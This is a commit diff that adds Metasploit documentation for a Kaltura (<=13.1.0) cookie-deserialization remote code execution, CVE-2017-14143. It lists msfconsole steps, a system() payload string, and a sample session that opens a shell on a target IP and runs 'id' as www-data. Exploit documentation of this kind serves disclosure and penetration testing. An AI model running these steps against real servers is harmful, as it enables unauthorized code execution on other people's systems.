Land rapid7#9205, Documentation for Kaltura <= 13.1.0 RCE (CVE-2017-14143)

Merge branch 'land-9205' into upstream-master

Author: bwatters-r7

documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md

@@ -0,0 +1,42 @@
+## Description 
+
+The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie. 
+ 
+
+## Vulnerable Application
+
+ This module exploits a remote code execution within the Kaltura(<=13.1.0) via a cookie deserialization.
+ Vulnerability reference- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143.
+ Installation of Kaltura is difficult, but here is an installation guide:
+ https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md
+
+
+## Verification Steps
+
+ 1. Start msfconsole
+ 2. `use exploit/linux/http/kaltura_unserialize_cookie_rce`
+ 3. `set RHOST https://example.com (or IP address)`
+ 4. `set ENTRYID 0_xxxxxxxx`
+ 5. `set payload generic/custom`
+ 6. `set payloadstr "system('command you want to execute, eg.- ls -la');"`
+ 7. `run`
+
+## Scenarios
+
+ ```
+ msf use exploits/linux/http/kaltura_unserialize_cookie_rce
+ msf exploit(kalkutra_unseialize_cookie_rce) set RHOST 46.101.209.202
+ RHOST => 46.101.209.202
+ msf exploit(kalkutra_unseialize_cookie_rce) set LHOST 192.168.1.16
+ LHOST => 192.168.1.16
+ msf exploit(kalkutra_unseialize_cookie_rce)>check
+ [+] 46.101.209.202:4444 The target is vulnerable.
+ msf exploit(kalkutra_unseialize_cookie_rce)>run
+ [*] Started bind handler
+ [*] Output:
+ [*] Command shell session 1 opened (192.168.1.16:36865 -> 46.101.209.202:4444) at 2017-09-04 12:09:03 +0200
+
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  ```
+